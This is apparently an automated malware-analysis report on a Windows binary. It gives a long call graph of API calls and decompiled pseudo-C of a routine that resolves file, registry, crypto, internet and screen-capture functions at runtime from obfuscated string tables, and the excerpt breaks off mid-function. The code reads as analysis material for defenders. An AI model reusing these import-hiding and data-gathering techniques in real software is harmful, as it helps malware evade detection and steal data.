402bd4 LocalAlloc 36861->36862 36863 401e90 36862->36863 36864 402bd4 LocalAlloc 36863->36864 36865 401ea6 36864->36865 36866 402bd4 LocalAlloc 36865->36866 36867 401ebc 36866->36867 36868 402bd4 LocalAlloc 36867->36868 36869 401ed2 36868->36869 36870 402bd4 LocalAlloc 36869->36870 36871 401ee8 36870->36871 36872 402bd4 LocalAlloc 36871->36872 36873 401efe 36872->36873 36874 402bd4 LocalAlloc 36873->36874 36875 401f14 36874->36875 36876 402bd4 LocalAlloc 36875->36876 36877 401f2a 36876->36877 36878 402bd4 LocalAlloc 36877->36878 36879 401f3f 36878->36879 36880 402bd4 LocalAlloc 36879->36880 36881 401f55 36880->36881 36882 402bd4 LocalAlloc 36881->36882 36883 401f6b 36882->36883 36884 402bd4 LocalAlloc 36883->36884 36885 401f81 36884->36885 36886 402bd4 LocalAlloc 36885->36886 36887 401f97 36886->36887 36888 402bd4 LocalAlloc 36887->36888 36889 401fad 36888->36889 36890 402bd4 LocalAlloc 36889->36890 36891 401fc2 36890->36891 36892 402bd4 LocalAlloc 36891->36892 36893 401fd8 36892->36893 36894 402bd4 LocalAlloc 36893->36894 36895 401fee 36894->36895 36896 402bd4 LocalAlloc 36895->36896 36897 402004 36896->36897 36898 402bd4 LocalAlloc 36897->36898 36899 40201a 36898->36899 36900 402bd4 LocalAlloc 36899->36900 36901 402030 36900->36901 36902 402bd4 LocalAlloc 36901->36902 36903 402046 36902->36903 36904 402bd4 LocalAlloc 36903->36904 36905 40205c 36904->36905 36906 402bd4 LocalAlloc 36905->36906 36907 402072 36906->36907 36908 402bd4 LocalAlloc 36907->36908 36909 402088 36908->36909 36910 402bd4 LocalAlloc 36909->36910 36911 40209e 36910->36911 36912 402bd4 LocalAlloc 36911->36912 36913 4020b4 36912->36913 36914 402bd4 LocalAlloc 36913->36914 36915 4020ca 36914->36915 36916 402bd4 LocalAlloc 36915->36916 36917 4020e0 36916->36917 36918 402bd4 LocalAlloc 36917->36918 36919 4020f6 36918->36919 36920 402bd4 LocalAlloc 36919->36920 36921 40210c 36920->36921 36922 402bd4 LocalAlloc 36921->36922 36923 402121 36922->36923 36924 402bd4 LocalAlloc 36923->36924 36925 402137 
36924->36925 36926 402bd4 LocalAlloc 36925->36926 36927 40214d 36926->36927 36928 402bd4 LocalAlloc 36927->36928 36929 402163 36928->36929 36930 402bd4 LocalAlloc 36929->36930 36931 402179 36930->36931 36932 402bd4 LocalAlloc 36931->36932 36933 40218f 36932->36933 36934 402bd4 LocalAlloc 36933->36934 36935 4021a5 36934->36935 36936 402bd4 LocalAlloc 36935->36936 36937 4021ba 36936->36937 36938 402bd4 LocalAlloc 36937->36938 36939 4021cf 36938->36939 36940 402bd4 LocalAlloc 36939->36940 36941 4021e5 36940->36941 36942 402bd4 LocalAlloc 36941->36942 36943 4021fb 36942->36943 36944 402bd4 LocalAlloc 36943->36944 36945 402211 36944->36945 36946 402bd4 LocalAlloc 36945->36946 36947 402226 36946->36947 36948 402bd4 LocalAlloc 36947->36948 36949 40223c 36948->36949 36950 402bd4 LocalAlloc 36949->36950 36951 402252 36950->36951 36952 402bd4 LocalAlloc 36951->36952 36953 402268 36952->36953 36954 402bd4 LocalAlloc 36953->36954 36955 40227e 36954->36955 36956 402bd4 LocalAlloc 36955->36956 36957 402294 36956->36957 36958 402bd4 LocalAlloc 36957->36958 36959 4022aa 36958->36959 36960 402bd4 LocalAlloc 36959->36960 36961 4022c0 36960->36961 36962 402bd4 LocalAlloc 36961->36962 36963 4022d5 36962->36963 36964 402bd4 LocalAlloc 36963->36964 36965 4022eb 36964->36965 36966 402bd4 LocalAlloc 36965->36966 36967 402300 36966->36967 36968 402bd4 LocalAlloc 36967->36968 36969 402316 36968->36969 36970 402bd4 LocalAlloc 36969->36970 36971 40232c 36970->36971 36972 402bd4 LocalAlloc 36971->36972 36973 402341 36972->36973 36974 402bd4 LocalAlloc 36973->36974 36975 402357 36974->36975 36976 402bd4 LocalAlloc 36975->36976 36977 40236d 36976->36977 36978 402bd4 LocalAlloc 36977->36978 36979 402383 36978->36979 36980 402bd4 LocalAlloc 36979->36980 36981 402399 36980->36981 36982 402bd4 LocalAlloc 36981->36982 36983 4023af 36982->36983 36984 402bd4 LocalAlloc 36983->36984 36985 4023c5 36984->36985 36986 402bd4 LocalAlloc 36985->36986 36987 4023da 36986->36987 36988 402bd4 LocalAlloc 
36987->36988 36989 4023ef 36988->36989 36990 402bd4 LocalAlloc 36989->36990 36991 402405 36990->36991 36992 402bd4 LocalAlloc 36991->36992 36993 40241b 36992->36993 36994 402bd4 LocalAlloc 36993->36994 36995 402431 36994->36995 36996 402bd4 LocalAlloc 36995->36996 36997 402447 36996->36997 36998 402bd4 LocalAlloc 36997->36998 36999 40245d 36998->36999 37000 402bd4 LocalAlloc 36999->37000 37001 402473 37000->37001 37002 402bd4 LocalAlloc 37001->37002 37003 402488 37002->37003 37004 402bd4 LocalAlloc 37003->37004 37005 40249e 37004->37005 37006 402bd4 LocalAlloc 37005->37006 37007 4024b4 37006->37007 37008 402bd4 LocalAlloc 37007->37008 37009 4024ca 37008->37009 37010 402bd4 LocalAlloc 37009->37010 37011 4024df 37010->37011 37012 402bd4 LocalAlloc 37011->37012 37013 4024f5 37012->37013 37014 402bd4 LocalAlloc 37013->37014 37015 40250b 37014->37015 37016 402bd4 LocalAlloc 37015->37016 37017 402520 37016->37017 37018 402bd4 LocalAlloc 37017->37018 37019 402535 37018->37019 37020 402bd4 LocalAlloc 37019->37020 37021 40254b 37020->37021 37022 402bd4 LocalAlloc 37021->37022 37023 402561 37022->37023 37024 402bd4 LocalAlloc 37023->37024 37025 402577 37024->37025 37026 402bd4 LocalAlloc 37025->37026 37027 40258d 37026->37027 37028 402bd4 LocalAlloc 37027->37028 37029 4025a3 37028->37029 37030 402bd4 LocalAlloc 37029->37030 37031 4025b9 37030->37031 37032 402bd4 LocalAlloc 37031->37032 37033 4025cf 37032->37033 37034 402bd4 LocalAlloc 37033->37034 37035 4025e7 37034->37035 37036 402bd4 LocalAlloc 37035->37036 37037 4025fc 37036->37037 37038 402bd4 LocalAlloc 37037->37038 37039 402611 37038->37039 37040 402bd4 LocalAlloc 37039->37040 37041 402626 37040->37041 37042 402bd4 LocalAlloc 37041->37042 37043 40263c 37042->37043 37044 402bd4 LocalAlloc 37043->37044 37045 402652 37044->37045 37046 402bd4 LocalAlloc 37045->37046 37047 402667 37046->37047 37048 402bd4 LocalAlloc 37047->37048 37049 40267c 37048->37049 37050 402bd4 LocalAlloc 37049->37050 37051 402692 37050->37051 37052 
402bd4 LocalAlloc 37051->37052 37053 4026a7 37052->37053 37054 402bd4 LocalAlloc 37053->37054 37055 4026bd 37054->37055 37056 402bd4 LocalAlloc 37055->37056 37057 4026d3 37056->37057 37058 402bd4 LocalAlloc 37057->37058 37059 4026e8 37058->37059 37060 402bd4 LocalAlloc 37059->37060 37061 4026fe 37060->37061 37062 402bd4 LocalAlloc 37061->37062 37063 402714 37062->37063 37064 402bd4 LocalAlloc 37063->37064 37065 40272a 37064->37065 37066 402bd4 LocalAlloc 37065->37066 37067 40273f 37066->37067 37068 402bd4 LocalAlloc 37067->37068 37069 402755 37068->37069 37070 402bd4 LocalAlloc 37069->37070 37071 40276b 37070->37071 37072 402bd4 LocalAlloc 37071->37072 37073 402781 37072->37073 37074 402bd4 LocalAlloc 37073->37074 37075 402797 37074->37075 37076 402bd4 LocalAlloc 37075->37076 37077 4027ad 37076->37077 37078 402bd4 LocalAlloc 37077->37078 37079 4027c2 37078->37079 37080 402bd4 LocalAlloc 37079->37080 37081 4027d8 37080->37081 37082 402bd4 LocalAlloc 37081->37082 37083 4027ed 37082->37083 37084 402bd4 LocalAlloc 37083->37084 37085 402803 37084->37085 37086 402bd4 LocalAlloc 37085->37086 37087 402819 37086->37087 37088 402bd4 LocalAlloc 37087->37088 37089 40282e 37088->37089 37090 402bd4 LocalAlloc 37089->37090 37091 402843 37090->37091 37092 402bd4 LocalAlloc 37091->37092 37093 402858 37092->37093 37094 402bd4 LocalAlloc 37093->37094 37095 40286e 37094->37095 37096 402bd4 LocalAlloc 37095->37096 37097 402883 37096->37097 37098 402bd4 LocalAlloc 37097->37098 37099 402898 37098->37099 37100 402bd4 LocalAlloc 37099->37100 37101 4028ad 37100->37101 37102 402bd4 LocalAlloc 37101->37102 37103 4028c2 37102->37103 37104 402bd4 LocalAlloc 37103->37104 37105 4028d7 37104->37105 37106 402bd4 LocalAlloc 37105->37106 37107 4028ed 37106->37107 37108 402bd4 LocalAlloc 37107->37108 37109 402903 37108->37109 37110 402bd4 LocalAlloc 37109->37110 37111 402919 37110->37111 37112 402bd4 LocalAlloc 37111->37112 37113 40292e 37112->37113 37114 402bd4 LocalAlloc 37113->37114 37115 402943 
37114->37115 37116 402bd4 LocalAlloc 37115->37116 37117 402958 37116->37117 37118 402bd4 LocalAlloc 37117->37118 37119 40296d 37118->37119 37120 402bd4 LocalAlloc 37119->37120 37121 402982 37120->37121 37122 402bd4 LocalAlloc 37121->37122 37123 402998 37122->37123 37124 402bd4 LocalAlloc 37123->37124 37125 4029ae 37124->37125 37126 402bd4 LocalAlloc 37125->37126 37127 4029c4 37126->37127 37128 402bd4 LocalAlloc 37127->37128 37129 4029d9 37128->37129 37130 402bd4 LocalAlloc 37129->37130 37131 4029ef 37130->37131 37132 402bd4 LocalAlloc 37131->37132 37133 402a05 37132->37133 37134 402bd4 LocalAlloc 37133->37134 37135 402a1b 37134->37135 37136 402bd4 LocalAlloc 37135->37136 37137 402a30 37136->37137 37138 402bd4 LocalAlloc 37137->37138 37139 402a46 37138->37139 37140 402bd4 LocalAlloc 37139->37140 37141 402a5b 37140->37141 37142 402bd4 LocalAlloc 37141->37142 37143 402a70 37142->37143 37144 402bd4 LocalAlloc 37143->37144 37145 402a85 37144->37145 37146 402bd4 LocalAlloc 37145->37146 37147 402a9b 37146->37147 37148 402bd4 LocalAlloc 37147->37148 37149 402ab0 37148->37149 37150 402bd4 LocalAlloc 37149->37150 37151 402ac6 37150->37151 37152 402bd4 LocalAlloc 37151->37152 37153 402adb 37152->37153 37154 402bd4 LocalAlloc 37153->37154 37155 402af0 37154->37155 37156 402bd4 LocalAlloc 37155->37156 37157 402b06 37156->37157 37158 402bd4 LocalAlloc 37157->37158 37159 402b1c 37158->37159 37160 402bd4 LocalAlloc 37159->37160 37161 402b32 37160->37161 37162 402bd4 LocalAlloc 37161->37162 37163 402b47 37162->37163 37164 402bd4 LocalAlloc 37163->37164 37165 402b5d 37164->37165 37166 402bd4 LocalAlloc 37165->37166 37167 402b72 37166->37167 37168 402bd4 LocalAlloc 37167->37168 37169 402b88 37168->37169 37170 402bd4 LocalAlloc 37169->37170 37171 402b9e 37170->37171 37172 402bd4 LocalAlloc 37171->37172 37173 402bb4 37172->37173 37174 402bd4 LocalAlloc 37173->37174 37175 402bca 37174->37175 37176 419473 LoadLibraryA 37175->37176 37177 419491 GetProcAddress GetProcAddress 37176->37177 
37178 41968c 12 API calls 37176->37178 37181 4194bc 27 API calls 37177->37181 37179 4197a7 37178->37179 37180 41973b 6 API calls 37178->37180 37182 4197e2 37179->37182 37183 4197ae GetProcAddress GetProcAddress GetProcAddress 37179->37183 37180->37179 37181->37178 37184 4197ea 10 API calls 37182->37184 37185 41989d 37182->37185 37183->37182 37184->37185 37186 4198a5 13 API calls 37185->37186 37187 41998e 37185->37187 37186->37187 37188 419a14 37187->37188 37189 419996 7 API calls 37187->37189 37190 419a72 37188->37190 37191 419a1b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37188->37191 37189->37188 37192 419a7d 11 API calls 37190->37192 37193 419b3f 37190->37193 37191->37190 37192->37193 37194 419b46 GetProcAddress GetProcAddress GetProcAddress 37193->37194 37195 419b7c 37193->37195 37194->37195 37196 419b83 GetProcAddress GetProcAddress GetProcAddress 37195->37196 37197 419bb6 37195->37197 37196->37197 37198 419c12 37197->37198 37199 419bbd GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37197->37199 37200 419c1a GetProcAddress 37198->37200 37201 40b632 37198->37201 37199->37198 37200->37201 37202 415610 GetSystemInfo 37201->37202 37288 417463 37202->37288 37206 415543 __EH_prolog3 37205->37206 37479 415c16 GetCurrentHwProfileA 37206->37479 37209 40c689 77 API calls 37210 415578 37209->37210 37485 415c6d 37210->37485 37213 40c689 77 API calls 37214 415597 37213->37214 37215 40d431 77 API calls 37214->37215 37216 4155a7 ctype 37215->37216 37217 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 37216->37217 37218 40b66d 37217->37218 37219 40d431 37218->37219 37220 40d44b 37219->37220 37222 40d454 37220->37222 37496 40d270 77 API calls 3 library calls 37220->37496 37222->36347 37223->36364 37224->36364 37225->36364 37226->36364 37227->36370 37228->36370 37229->36362 37230->36366 37231->36373 37232->36378 37233->36382 37234->36384 37235->36386 37236->36388 37237->36390 37238->36394 37239->36396 
37240->36398 37241->36400 37242->36402 37243->36404 37244->36406 37245->36408 37246->36410 37247->36412 37248->36414 37249->36416 37250->36418 37251->36420 37252->36422 37253->36424 37254->36426 37255->36428 37256->36430 37257->36432 37258->36434 37259->36438 37260->36442 37261->36446 37262->36450 37263->36454 37264->36458 37265->36462 37266->36466 37267->36468 37268->36472 37269->36474 37270->36478 37271->36486 37272->36475 37273->36479 37274->36492 37275->36497 37276->36501 37277->36485 37278->36488 37279->36500 37280->36504 37281->36508 37282->36507 37283->36527 37284->36521 37285->36529 37287 401171 37286->37287 37287->36556 37289 417472 __EH_prolog3_GS 37288->37289 37302 4169f3 37289->37302 37291 4174c4 37306 414f20 37291->37306 37293 4174eb 37316 417da6 37293->37316 37295 417517 37330 40c982 37295->37330 37297 417526 ctype 37333 40b593 37297->37333 37301 40b63f 37301->36342 37303 4169ff __EH_prolog3 37302->37303 37340 414c17 37303->37340 37305 416a0f std::locale::_Init 37305->37291 37307 414f2c __EH_prolog3 37306->37307 37448 41d5c1 37307->37448 37310 41eb16 std::locale::_Init 77 API calls 37311 414f48 37310->37311 37312 41d9c9 std::locale::_Init 82 API calls 37311->37312 37314 414f62 std::locale::_Init ctype 37311->37314 37313 414f54 37312->37313 37315 40f13e std::locale::facet::_Incref 2 API calls 37313->37315 37314->37293 37315->37314 37317 417db2 __EH_prolog3_catch 37316->37317 37454 416a67 37317->37454 37319 417dc5 37320 40f3f7 2 API calls 37319->37320 37329 417df5 37319->37329 37324 417de0 37320->37324 37321 417e6f 37458 416ac3 37321->37458 37462 41914c 114 API calls 7 library calls 37324->37462 37325 417e7c std::locale::_Init 37325->37295 37327 417dea 37328 407d49 std::ios_base::_Ios_base_dtor 2 API calls 37327->37328 37328->37329 37329->37321 37463 4143b2 67 API calls 37329->37463 37466 40d0d9 37330->37466 37334 40b59e 37333->37334 37475 41d4ea 37334->37475 37336 40b5aa 37337 421a61 37336->37337 37338 41deb4 __ehhandler$___std_fs_change_permissions@12 
5 API calls 37337->37338 37339 421a6b 37338->37339 37339->37339 37341 414c23 __EH_prolog3 37340->37341 37344 414ea2 37341->37344 37343 414c4c std::locale::_Init 37343->37305 37345 41eb16 std::locale::_Init 77 API calls 37344->37345 37346 414ed6 37345->37346 37347 414ef0 37346->37347 37355 41d9c9 37346->37355 37371 414fcb 37347->37371 37350 414ee2 37379 40f13e 37350->37379 37351 414f09 37352 414f1b 37351->37352 37384 4143b2 67 API calls 37351->37384 37352->37343 37356 41d9d5 __EH_prolog3 37355->37356 37357 41da50 std::locale::_Init 37356->37357 37385 41d582 37356->37385 37357->37350 37360 41eb16 std::locale::_Init 77 API calls 37362 41da00 37360->37362 37365 41da0d 37362->37365 37393 41d926 66 API calls _Yarn 37362->37393 37389 41d78e 37365->37389 37368 41da2d 37369 40f13e std::locale::facet::_Incref 2 API calls 37368->37369 37370 41da3a 37369->37370 37395 41d5aa 37370->37395 37372 414fd7 __EH_prolog3 37371->37372 37412 40f3f7 37372->37412 37376 414fec 37433 407d49 37376->37433 37378 414ffb std::locale::_Init 37378->37351 37380 41d582 std::_Lockit::_Lockit EnterCriticalSection 37379->37380 37381 40f14f 37380->37381 37382 41d5aa std::locale::facet::_Incref LeaveCriticalSection 37381->37382 37383 40f163 37382->37383 37383->37347 37384->37352 37386 41d5a2 37385->37386 37387 41d594 37385->37387 37386->37360 37386->37370 37399 41dde4 EnterCriticalSection 37387->37399 37390 41d79c 37389->37390 37391 41d7ad 37389->37391 37400 41de04 37390->37400 37394 41d881 66 API calls 3 library calls 37391->37394 37393->37365 37394->37368 37396 41d5b1 37395->37396 37398 41d5bf 37395->37398 37411 41ddf4 LeaveCriticalSection 37396->37411 37398->37357 37399->37386 37401 41de12 37400->37401 37402 41de18 RtlEncodePointer 37400->37402 37403 42f079 _abort DecodePointer 37401->37403 37402->37391 37404 423ea9 37403->37404 37405 42f086 _raise 67 API calls 37404->37405 37406 423eb4 37404->37406 37405->37406 37407 423ecc 37406->37407 37408 424d60 __call_reportfault 8 API calls 37406->37408 37409 
4243ae __amsg_exit 66 API calls 37407->37409 37408->37407 37410 423ed6 37409->37410 37411->37398 37413 40f13e std::locale::facet::_Incref 2 API calls 37412->37413 37414 40f403 37413->37414 37415 415153 37414->37415 37416 41515f __EH_prolog3 37415->37416 37417 41d582 std::_Lockit::_Lockit EnterCriticalSection 37416->37417 37418 415169 37417->37418 37437 40f10d 37418->37437 37420 415180 37422 415194 37420->37422 37443 40f1bf 114 API calls 3 library calls 37420->37443 37421 41d5aa std::locale::facet::_Incref LeaveCriticalSection 37423 4151e9 std::locale::_Init 37421->37423 37422->37421 37423->37376 37425 4151a4 37426 4151c6 37425->37426 37444 41e1c5 66 API calls std::exception::exception 37425->37444 37427 40f13e std::locale::facet::_Incref 2 API calls 37426->37427 37429 4151d6 37427->37429 37446 41d711 77 API calls std::locale::_Init 37429->37446 37430 4151b8 37445 421126 RaiseException 37430->37445 37434 407d4f 37433->37434 37436 407d54 37433->37436 37447 407d0e EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::facet::_Incref 37434->37447 37436->37378 37438 40f116 37437->37438 37439 40f13a 37437->37439 37440 41d582 std::_Lockit::_Lockit EnterCriticalSection 37438->37440 37439->37420 37441 40f120 37440->37441 37442 41d5aa std::locale::facet::_Incref LeaveCriticalSection 37441->37442 37442->37439 37443->37425 37444->37430 37445->37426 37446->37422 37447->37436 37449 41eb16 std::locale::_Init 77 API calls 37448->37449 37450 41d5cd 37449->37450 37453 41ddc4 InitializeCriticalSection 37450->37453 37452 414f3d 37452->37310 37453->37452 37455 416a73 __EH_prolog3 37454->37455 37456 416aa9 std::locale::_Init 37455->37456 37464 41437f 67 API calls 37455->37464 37456->37319 37459 416acf __EH_prolog3 37458->37459 37460 416ae6 std::locale::_Init 37459->37460 37465 416b08 67 API calls 2 library calls 37459->37465 37460->37325 37462->37327 37463->37321 37464->37456 37465->37460 37467 40d0e5 __EH_prolog3_GS 37466->37467 37468 40d139 37467->37468 37469 
40d0fa 37467->37469 37471 403a16 numpunct 77 API calls 37468->37471 37472 40d122 ctype 37468->37472 37470 403a16 numpunct 77 API calls 37469->37470 37470->37472 37471->37472 37473 421a61 ctype 5 API calls 37472->37473 37474 40c995 37473->37474 37474->37297 37476 41d4f9 std::ios_base::_Tidy 37475->37476 37477 407d49 std::ios_base::_Ios_base_dtor 2 API calls 37476->37477 37478 41d51e codecvt 37476->37478 37477->37478 37478->37336 37480 415c4e 37479->37480 37481 40381a numpunct 77 API calls 37480->37481 37482 415c5e 37481->37482 37483 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 37482->37483 37484 415568 37483->37484 37484->37209 37494 427e30 37485->37494 37488 415ce9 RegCloseKey CharToOemA 37490 40381a numpunct 77 API calls 37488->37490 37489 415cce RegQueryValueExA 37489->37488 37491 415d1a 37490->37491 37492 41deb4 __ehhandler$___std_fs_change_permissions@12 5 API calls 37491->37492 37493 415586 37492->37493 37493->37213 37495 415cad RegOpenKeyExA 37494->37495 37495->37488 37495->37489 37496->37222

                                                                                C-Code - Quality: 98%
                                                                                			E00419473() {
                                                                                				struct HINSTANCE__* _v8;
                                                                                				struct HINSTANCE__* _v12;
                                                                                				struct HINSTANCE__* _v16;
                                                                                				struct HINSTANCE__* _v20;
                                                                                				struct HINSTANCE__* _v24;
                                                                                				struct HINSTANCE__* _v28;
                                                                                				struct HINSTANCE__* _v32;
                                                                                				struct HINSTANCE__* _v36;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				struct HINSTANCE__* _t20;
                                                                                				struct HINSTANCE__* _t26;
                                                                                				struct HINSTANCE__* _t29;
                                                                                				_Unknown_base(*)()* _t30;
                                                                                				_Unknown_base(*)()* _t31;
                                                                                				_Unknown_base(*)()* _t89;
                                                                                				struct HINSTANCE__* _t119;
                                                                                				struct HINSTANCE__* _t122;
                                                                                				struct HINSTANCE__* _t126;
                                                                                				struct HINSTANCE__* _t127;
                                                                                				struct HINSTANCE__* _t128;
                                                                                				struct HINSTANCE__* _t129;
                                                                                				struct HINSTANCE__* _t130;
                                                                                				struct HINSTANCE__* _t131;
                                                                                				struct HINSTANCE__* _t132;
                                                                                				struct HINSTANCE__* _t133;
                                                                                				struct HINSTANCE__* _t134;
                                                                                
                                                                                				_t126 = LoadLibraryA( *0x449bec);
                                                                                				if(_t126 != 0) {
                                                                                					 *0x44a1b0 = GetProcAddress(_t126,  *0x449c74);
                                                                                					_t89 = GetProcAddress(_t126,  *0x449e00);
                                                                                					 *0x44a160 = _t89;
                                                                                					 *0x44a1dc =  *_t89(_t126,  *0x449d54);
                                                                                					 *0x44a1e0 = GetProcAddress(_t126, "CreateThread");
                                                                                					 *0x44a228 = GetProcAddress(_t126, "GlobalMemoryStatusEx");
                                                                                					 *0x44a1cc = GetProcAddress(_t126, "IsWow64Process");
                                                                                					 *0x44a124 = GetProcAddress(_t126, "GetUserDefaultLocaleName");
                                                                                					 *0x44a11c = GetProcAddress(_t126, "GetSystemInfo");
                                                                                					 *0x44a184 = GetProcAddress(_t126, "WideCharToMultiByte");
                                                                                					 *0x44a21c = GetProcAddress(_t126, "LocalFree");
                                                                                					 *0x44a1ac = GetProcAddress(_t126, "HeapAlloc");
                                                                                					 *0x44a1f4 = GetProcAddress(_t126, "GetProcessHeap");
                                                                                					 *0x44a0f0 = GetProcAddress(_t126, "CreateFileA");
                                                                                					 *0x44a1fc = GetProcAddress(_t126, "GetFileSize");
                                                                                					 *0x44a194 = GetProcAddress(_t126, "ReadFile");
                                                                                					 *0x44a0f4 = GetProcAddress(_t126, "CloseHandle");
                                                                                					 *0x44a180 = GetProcAddress(_t126, "GetLogicalDriveStringsA");
                                                                                					 *0x44a128 = GetProcAddress(_t126, "lstrlenA");
                                                                                					 *0x44a110 = GetProcAddress(_t126, "GetDriveTypeA");
                                                                                					 *0x44a220 = GetProcAddress(_t126, "lstrcpyA");
                                                                                					 *0x44a0dc = GetProcAddress(_t126, "MultiByteToWideChar");
                                                                                					 *0x44a1b8 = GetProcAddress(_t126, "lstrcatA");
                                                                                					 *0x44a22c = GetProcAddress(_t126, "FindFirstFileA");
                                                                                					 *0x44a138 = GetProcAddress(_t126, "FindNextFileA");
                                                                                					 *0x44a0e8 = GetProcAddress(_t126, "FindClose");
                                                                                					 *0x44a18c = GetProcAddress(_t126, "CreateMutexA");
                                                                                					 *0x44a19c = GetProcAddress(_t126, "GetLastError");
                                                                                					 *0x44a174 = GetProcAddress(_t126, "lstrcpynA");
                                                                                					 *0x44a100 = GetProcAddress(_t126, "GlobalLock");
                                                                                					 *0x44a0b8 = GetProcAddress(_t126, "GlobalSize");
                                                                                				}
                                                                                				_t19 = LoadLibraryA( *0x449d1c); // executed
                                                                                				_t127 = _t19; // executed
                                                                                				_t20 = LoadLibraryA( *0x449c3c); // executed
                                                                                				_v12 = _t20;
                                                                                				_t122 = LoadLibraryA( *0x449f40);
                                                                                				_t119 = LoadLibraryA( *0x449cf0);
                                                                                				_v16 = LoadLibraryA( *0x449bd0);
                                                                                				_v20 = LoadLibraryA( *0x449f84);
                                                                                				_v24 = LoadLibraryA( *0x449b98);
                                                                                				_t26 = LoadLibraryA( *0x449c80); // executed
                                                                                				_v28 = _t26;
                                                                                				_v32 = LoadLibraryA("shell32.dll");
                                                                                				_v36 = LoadLibraryA("shlwapi.dll");
                                                                                				_t29 = LoadLibraryA("dbghelp.dll"); // executed
                                                                                				_v8 = _t29;
                                                                                				_t30 = LoadLibraryA("gdiplus.dll");
                                                                                				if(_t127 != 0) {
                                                                                					 *0x44a158 = GetProcAddress(_t127,  *0x449bbc);
                                                                                					 *0x44a1b4 = GetProcAddress(_t127,  *0x449fc0);
                                                                                					 *0x44a120 = GetProcAddress(_t127,  *0x449e48);
                                                                                					 *0x44a10c = GetProcAddress(_t127,  *0x449d48);
                                                                                					 *0x44a0fc = GetProcAddress(_t127,  *0x449e60);
                                                                                					_t30 = GetProcAddress(_t127,  *0x449b9c);
                                                                                					 *0x44a1e8 = _t30;
                                                                                				}
                                                                                				_t128 = _v12;
                                                                                				if(_t128 != 0) {
                                                                                					 *0x44a130 = GetProcAddress(_t128,  *0x449d3c);
                                                                                					 *0x44a0b4 = GetProcAddress(_t128, "CryptBinaryToStringA");
                                                                                					_t30 = GetProcAddress(_t128, "CryptStringToBinaryA");
                                                                                					 *0x44a198 = _t30;
                                                                                				}
                                                                                				if(_t122 != 0) {
                                                                                					 *0x44a140 = GetProcAddress(_t122,  *0x449f74);
                                                                                					 *0x44a134 = GetProcAddress(_t122,  *0x449e70);
                                                                                					 *0x44a188 = GetProcAddress(_t122,  *0x449c14);
                                                                                					 *0x44a208 = GetProcAddress(_t122,  *0x449fd4);
                                                                                					 *0x44a0bc = GetProcAddress(_t122,  *0x449d30);
                                                                                					 *0x44a1ec = GetProcAddress(_t122,  *0x449c78);
                                                                                					 *0x44a118 = GetProcAddress(_t122,  *0x449edc);
                                                                                					 *0x44a144 = GetProcAddress(_t122,  *0x449eb8);
                                                                                					 *0x44a0c0 = GetProcAddress(_t122,  *0x449fc4);
                                                                                					_t30 = GetProcAddress(_t122, "RegEnumValueA");
                                                                                					 *0x44a214 = _t30;
                                                                                				}
                                                                                				if(_t119 != 0) {
                                                                                					 *0x44a14c = GetProcAddress(_t119,  *0x449c98);
                                                                                					 *0x44a168 = GetProcAddress(_t119,  *0x449e9c);
                                                                                					 *0x44a1c8 = GetProcAddress(_t119,  *0x449e8c);
                                                                                					 *0x44a210 = GetProcAddress(_t119,  *0x449e68);
                                                                                					 *0x44a1f0 = GetProcAddress(_t119,  *0x449ca4);
                                                                                					 *0x44a150 = GetProcAddress(_t119,  *0x449e08);
                                                                                					 *0x44a0d8 = GetProcAddress(_t119,  *0x449fac);
                                                                                					 *0x44a224 = GetProcAddress(_t119,  *0x449d90);
                                                                                					 *0x44a178 = GetProcAddress(_t119,  *0x449ffc);
                                                                                					 *0x44a154 = GetProcAddress(_t119,  *0x449cb0);
                                                                                					 *0x44a0b0 = GetProcAddress(_t119,  *0x449dec);
                                                                                					 *0x44a13c = GetProcAddress(_t119,  *0x449fec);
                                                                                					_t30 = GetProcAddress(_t119, "InternetCrackUrlA");
                                                                                					 *0x44a114 = _t30;
                                                                                				}
                                                                                				_t129 = _v16;
                                                                                				if(_t129 != 0) {
                                                                                					 *0x44a0f8 = GetProcAddress(_t129,  *0x449cac);
                                                                                					 *0x44a0e0 = GetProcAddress(_t129,  *0x449f18);
                                                                                					 *0x44a0cc = GetProcAddress(_t129,  *0x449cd4);
                                                                                					 *0x44a1c4 = GetProcAddress(_t129,  *0x449eec);
                                                                                					 *0x44a190 = GetProcAddress(_t129,  *0x449e2c);
                                                                                					 *0x44a15c = GetProcAddress(_t129,  *0x449c2c);
                                                                                					_t30 = GetProcAddress(_t129,  *0x44a00c);
                                                                                					 *0x44a148 = _t30;
                                                                                				}
                                                                                				_t130 = _v20;
                                                                                				if(_t130 != 0) {
                                                                                					 *0x44a104 = GetProcAddress(_t130,  *0x449e30);
                                                                                					 *0x44a1c0 = GetProcAddress(_t130,  *0x449d10);
                                                                                					 *0x44a1d0 = GetProcAddress(_t130, "CoInitialize");
                                                                                					 *0x44a16c = GetProcAddress(_t130, "CreateStreamOnHGlobal");
                                                                                					_t30 = GetProcAddress(_t130, "GetHGlobalFromStream");
                                                                                					 *0x44a0d4 = _t30;
                                                                                				}
                                                                                				_t131 = _v24;
                                                                                				if(_t131 != 0) {
                                                                                					 *0x44a0c8 = GetProcAddress(_t131, "GetDesktopWindow");
                                                                                					 *0x44a1bc = GetProcAddress(_t131,  *0x449da8);
                                                                                					 *0x44a1a0 = GetProcAddress(_t131,  *0x449ef8);
                                                                                					 *0x44a0d0 = GetProcAddress(_t131,  *0x449f30);
                                                                                					 *0x44a204 = GetProcAddress(_t131,  *0x449f2c);
                                                                                					 *0x44a0c4 = GetProcAddress(_t131,  *0x449d0c);
                                                                                					 *0x44a1a4 = GetProcAddress(_t131,  *0x449e5c);
                                                                                					 *0x44a20c = GetProcAddress(_t131,  *0x449cbc);
                                                                                					 *0x44a218 = GetProcAddress(_t131, "GetWindowRect");
                                                                                					 *0x44a1e4 = GetProcAddress(_t131, "GetWindowDC");
                                                                                					_t30 = GetProcAddress(_t131, "CloseWindow");
                                                                                					 *0x44a200 = _t30;
                                                                                				}
                                                                                				_t132 = _v28;
                                                                                				if(_t132 != 0) {
                                                                                					 *0x44a1d4 = GetProcAddress(_t132,  *0x449d74);
                                                                                					 *0x44a0ec = GetProcAddress(_t132,  *0x449e98);
                                                                                					_t30 = GetProcAddress(_t132,  *0x449f24);
                                                                                					 *0x44a17c = _t30;
                                                                                				}
                                                                                				_t133 = _v32;
                                                                                				if(_t133 != 0) {
